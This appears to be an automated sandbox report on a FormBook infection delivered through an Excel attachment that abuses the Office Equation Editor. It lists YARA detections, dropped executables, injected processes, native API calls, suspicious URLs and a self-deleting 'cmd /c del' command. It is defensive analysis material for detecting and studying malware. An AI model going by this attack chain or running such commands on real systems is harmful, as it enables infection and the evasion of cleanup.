Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/Free_Credit_Report.cfm?fp=qmv9xFBTKEA6LAcskD2eWPFr51ekSLBBN0JW8jVu%2FU
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/Work_from_Home.cfm?fp=qmv9xFBTKEA6LAcskD2eWPFr51ekSLBBN0JW8jVu%2FUUZJT
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/display.cfm
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/dy8g/?illD=OTag2QWxPYUT5Vjr08k9uySlAuCzwAh9yU7TJs1orjitWjs6OQC6P28HkD9
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/find_a_tutor.cfm?fp=qmv9xFBTKEA6LAcskD2eWPFr51ekSLBBN0JW8jVu%2FUUZJTLt
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/px.js?ch=2
Source: wuapp.exe, 0000000B.00000002.692708409.00000000028F2000.00000004.00020000.sdmp String found in binary or memory: http://www.onedadtwodudes.com/sk-logabpstatus.php?a=VWFRUU1lL1pRcXBSSlh6S0wrZnpqVkRFSTlReFR5VHJjUENN
Source: explorer.exe, 0000000A.00000000.508760960.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000A.00000000.508760960.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.497685045.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000A.00000000.483971283.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 0000000A.00000000.483971283.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000A.00000000.483971283.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AA6CA394.emf
Source: unknown DNS traffic detected: queries for: www.garimpeirastore.online

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe Jump to dropped file
Yara signature match
Source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 0093DF5C appears 91 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00E442E2 appears 32 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00E43B80 appears 42 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0098373B appears 204 times
Source: C:\Users\Public\vbc.exe Code function: String function: 009AF970 appears 76 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00983F92 appears 94 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0093E2A8 appears 34 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 00C2F970 appears 81 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 00BBDF5C appears 105 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 00BBE2A8 appears 38 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 00C0373B appears 238 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 00C03F92 appears 108 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 8_2_004181D0 NtCreateFile, 8_2_004181D0
Source: C:\Users\Public\vbc.exe Code function: 8_2_00418280 NtReadFile, 8_2_00418280
Source: C:\Users\Public\vbc.exe Code function: 8_2_00418300 NtClose, 8_2_00418300
Source: C:\Users\Public\vbc.exe Code function: 8_2_004183B0 NtAllocateVirtualMemory, 8_2_004183B0
Source: C:\Users\Public\vbc.exe Code function: 8_2_00418222 NtCreateFile, 8_2_00418222
Source: C:\Users\Public\vbc.exe Code function: 8_2_004183AA NtAllocateVirtualMemory, 8_2_004183AA
Source: C:\Users\Public\vbc.exe Code function: 8_2_009300C4 NtCreateFile,LdrInitializeThunk, 8_2_009300C4
Source: C:\Users\Public\vbc.exe Code function: 8_2_00930048 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_00930048
Source: C:\Users\Public\vbc.exe Code function: 8_2_00930078 NtResumeThread,LdrInitializeThunk, 8_2_00930078
Source: C:\Users\Public\vbc.exe Code function: 8_2_009307AC NtCreateMutant,LdrInitializeThunk, 8_2_009307AC
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092F9F0 NtClose,LdrInitializeThunk, 8_2_0092F9F0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092F900 NtReadFile,LdrInitializeThunk, 8_2_0092F900
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_0092FAD0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_0092FAE8
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_0092FBB8
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_0092FB68
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FC90 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_0092FC90
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_0092FC60
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FD8C NtDelayExecution,LdrInitializeThunk, 8_2_0092FD8C
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_0092FDC0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FEA0 NtReadVirtualMemory,LdrInitializeThunk, 8_2_0092FEA0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_0092FED0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FFB4 NtCreateSection,LdrInitializeThunk, 8_2_0092FFB4
Source: C:\Users\Public\vbc.exe Code function: 8_2_009310D0 NtOpenProcessToken, 8_2_009310D0
Source: C:\Users\Public\vbc.exe Code function: 8_2_00930060 NtQuerySection, 8_2_00930060
Source: C:\Users\Public\vbc.exe Code function: 8_2_009301D4 NtSetValueKey, 8_2_009301D4
Source: C:\Users\Public\vbc.exe Code function: 8_2_0093010C NtOpenDirectoryObject, 8_2_0093010C
Source: C:\Users\Public\vbc.exe Code function: 8_2_00931148 NtOpenThread, 8_2_00931148
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092F8CC NtWaitForSingleObject, 8_2_0092F8CC
Source: C:\Users\Public\vbc.exe Code function: 8_2_00931930 NtSetContextThread, 8_2_00931930
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092F938 NtWriteFile, 8_2_0092F938
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FAB8 NtQueryValueKey, 8_2_0092FAB8
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FA20 NtQueryInformationFile, 8_2_0092FA20
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FA50 NtEnumerateValueKey, 8_2_0092FA50
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FBE8 NtQueryVirtualMemory, 8_2_0092FBE8
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FB50 NtCreateKey, 8_2_0092FB50
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FC30 NtOpenProcess, 8_2_0092FC30
Source: C:\Users\Public\vbc.exe Code function: 8_2_00930C40 NtGetContextThread, 8_2_00930C40
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FC48 NtSetInformationFile, 8_2_0092FC48
Source: C:\Users\Public\vbc.exe Code function: 8_2_00931D80 NtSuspendThread, 8_2_00931D80
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB00C4 NtCreateFile,LdrInitializeThunk, 11_2_00BB00C4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB07AC NtCreateMutant,LdrInitializeThunk, 11_2_00BB07AC
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAF9F0 NtClose,LdrInitializeThunk, 11_2_00BAF9F0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAF900 NtReadFile,LdrInitializeThunk, 11_2_00BAF900
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFAB8 NtQueryValueKey,LdrInitializeThunk, 11_2_00BAFAB8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFAE8 NtQueryInformationProcess,LdrInitializeThunk, 11_2_00BAFAE8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 11_2_00BAFAD0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFBB8 NtQueryInformationToken,LdrInitializeThunk, 11_2_00BAFBB8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFB68 NtFreeVirtualMemory,LdrInitializeThunk, 11_2_00BAFB68
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFB50 NtCreateKey,LdrInitializeThunk, 11_2_00BAFB50
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFC60 NtMapViewOfSection,LdrInitializeThunk, 11_2_00BAFC60
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFD8C NtDelayExecution,LdrInitializeThunk, 11_2_00BAFD8C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFDC0 NtQuerySystemInformation,LdrInitializeThunk, 11_2_00BAFDC0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 11_2_00BAFED0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFFB4 NtCreateSection,LdrInitializeThunk, 11_2_00BAFFB4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB10D0 NtOpenProcessToken, 11_2_00BB10D0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB0078 NtResumeThread, 11_2_00BB0078
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB0060 NtQuerySection, 11_2_00BB0060
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB0048 NtProtectVirtualMemory, 11_2_00BB0048
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB01D4 NtSetValueKey, 11_2_00BB01D4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB010C NtOpenDirectoryObject, 11_2_00BB010C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB1148 NtOpenThread, 11_2_00BB1148
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAF8CC NtWaitForSingleObject, 11_2_00BAF8CC
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAF938 NtWriteFile, 11_2_00BAF938
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB1930 NtSetContextThread, 11_2_00BB1930
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFA20 NtQueryInformationFile, 11_2_00BAFA20
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFA50 NtEnumerateValueKey, 11_2_00BAFA50
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFBE8 NtQueryVirtualMemory, 11_2_00BAFBE8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFC90 NtUnmapViewOfSection, 11_2_00BAFC90
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFC30 NtOpenProcess, 11_2_00BAFC30
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFC48 NtSetInformationFile, 11_2_00BAFC48
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB0C40 NtGetContextThread, 11_2_00BB0C40
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB1D80 NtSuspendThread, 11_2_00BB1D80
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFD5C NtEnumerateKey, 11_2_00BAFD5C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFEA0 NtReadVirtualMemory, 11_2_00BAFEA0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFE24 NtWriteVirtualMemory, 11_2_00BAFE24
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFFFC NtCreateProcessEx, 11_2_00BAFFFC
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFF34 NtQueueApcThread, 11_2_00BAFF34
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F81D0 NtCreateFile, 11_2_000F81D0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F8280 NtReadFile, 11_2_000F8280
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F8300 NtClose, 11_2_000F8300
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F83B0 NtAllocateVirtualMemory, 11_2_000F83B0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F8222 NtCreateFile, 11_2_000F8222
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F83AA NtAllocateVirtualMemory, 11_2_000F83AA
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: Remittance_Advice_details001009142021.xlsx ReversingLabs: Detection: 34%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wuapp.exe C:\Windows\SysWOW64\wuapp.exe
Source: C:\Windows\SysWOW64\wuapp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\SysWOW64\wuapp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Remittance_Advice_details001009142021.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRFCC5.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/21@6/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E41450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree, 6_2_00E41450
Source: C:\Users\Public\vbc.exe Code function: 8_2_00E41450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree, 8_2_00E41450
Source: explorer.exe, 0000000A.00000000.497685045.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, wuapp.exe
Source: Binary string: wuapp.pdb source: vbc.exe, 00000008.00000002.521643579.0000000000839000.00000004.00000020.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E43BC5 push ecx; ret 6_2_00E43BD8
Source: C:\Users\Public\vbc.exe Code function: 8_2_004062F6 pushfd ; ret 8_2_004062F7
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B3C5 push eax; ret 8_2_0041B418
Source: C:\Users\Public\vbc.exe Code function: 8_2_004153FC push eax; retf 8_2_0041540B
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B47C push eax; ret 8_2_0041B482
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B412 push eax; ret 8_2_0041B418
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B41B push eax; ret 8_2_0041B482
Source: C:\Users\Public\vbc.exe Code function: 8_2_00415CE7 pushad ; ret 8_2_00415D4B
